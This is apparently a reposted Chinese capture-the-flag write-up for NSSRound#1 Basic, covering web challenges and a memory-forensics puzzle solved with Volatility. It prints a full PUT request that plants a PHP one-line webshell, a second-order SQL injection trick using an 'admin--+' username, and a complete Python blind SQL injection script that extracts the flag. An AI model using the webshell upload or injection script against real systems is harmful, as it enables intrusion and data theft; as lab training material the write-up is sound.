当前位置:网站首页>[NSSRound#1 Basic]
[NSSRound#1 Basic]
2022-08-04 05:27:00 【Ki10Moc】
WEB
basic_check
发现允许PUT方法请求
PUT /shell.php HTTP/1.1
Host: 1.14.71.254:28848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
<?php eval($_POST[1]);?>
写入一句话
rce即可
Basic]sql_by_sql
先注册,进去有个修改密码
可能是二次注入
修改密码处源码
<!-- update user set password='%s' where username='%s'; -->
重新注册一个admin--+
获得admin身份
在/query下查询
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2022/8/3 21:42
# @Author : ki10Moc
# @FileName: [NSSRound#1 Basic]sql_by_sql.py
# @Software: PyCharm
# Link: ki10.top
import requests
import string
str = string.ascii_letters + string.digits
url = "http://1.14.71.254:28697/query"
s = requests.session()
headers = {
'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.YklOVg.Pz554uNEiaxxBCpP4pm7-G8iucg'}
if __name__ == "__main__":
name = ''
for i in range(0,100):
char = ''
for j in str:
#表+字段
#payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
#数据
payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
data = {
"id": payload}
r = s.post(url=url, data=data, headers=headers)
#print(r.text)
if "exist" in r.text:
name += j
print (j, end='')
char = j
break
if char == '%':
break
MISC
cut_into_thirds
python vol.py -f ./cut_into_thirds.raw imageinfo
得到版本号
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist
这有个引人注意的进程
获取dump文件
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 memdump -p 1164 -D ./
foremost分离得到part1
part1:3930653363343839PK?
直接dump目标文件
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 procdump -p 1164 -D ./
并查找相关信息
strings ./executable.1164.exe
得到part2
part2:GRRGGYJNGQ4GKMBNMJRTONI=
最后查看用户信息得到part3
分别进行base16、32、64解密即可
边栏推荐
- 什么是跨域和同源
- [原创]STL容器map和unordered_map性能,创建,插入,随机访问速度对比!
- 【Matlab仿真】:一带电量为q的电荷以速度v运动,求运动电荷产生磁感应强度
- npm init [email protected] 构建项目报错SyntaxError: Unexpected token ‘.‘解决办法
- 大龄程序员的心理建设
- 7.18 Day23 - the markup language
- LCP 17. 速算机器人
- 个人练习三剑客基础之模仿CSDN首页
- 4.2 声明式事务概念
- The cost of automated testing is high and the effect is poor, so what is the significance of automated testing?
猜你喜欢
![Deploy LVS-DR cluster [experimental]](/img/ad/84e05a6421d668b0b6ba6eeba0c730.jpg)
Deploy LVS-DR cluster [experimental]
MySQL log articles, binlog log of MySQL log, detailed explanation of binlog log
7.13 Day20----MYSQL
实际开发中,如何实现复选框的全选和不选
CentOS7 - yum install mysql
将两个DataTable合并——DataTable.Merge 方法
Unity Visual Effect Graph入门与实践
Swoole学习(二)
8. Custom mapping resultMap
7.16 Day22---MYSQL(Dao模式封装JDBC)
随机推荐
谷粒商城-基础篇(项目简介&项目搭建)
webrtc中的引用计框架
MySQL date functions
12. Paging plugin
7.15 Day21---MySQL----索引
4.1 声明式事务之JdbcTemplate
PHP解决字符乱码问题(多种编码转换)
ES6 Const Let Var的区别
【问题解决】同一机器上Flask部署TensorRT报错记录
跳转页面实时调用后台接口,更新页面数据
关系型数据库-MySQL:约束管理、索引管理、键管理语句
webrtc中视频采集实现分析(二) 视频帧的分发
Can 't connect to MySQL server on' localhost3306 '(10061) simple solutions
npm报错Beginning October 4, 2021, all connections to the npm registry - including for package installa
程序员也应了解的Unity粒子系统
MySQL log articles, binlog log of MySQL log, detailed explanation of binlog log
关系型数据库-MySQL:体系结构
Cannot read properties of null (reading ‘insertBefore‘)
ORACLE LINUX 6.5 安装重启后Kernel panic - not syncing : Fatal exception
实现登录密码混合动态因子,且动态因子隐式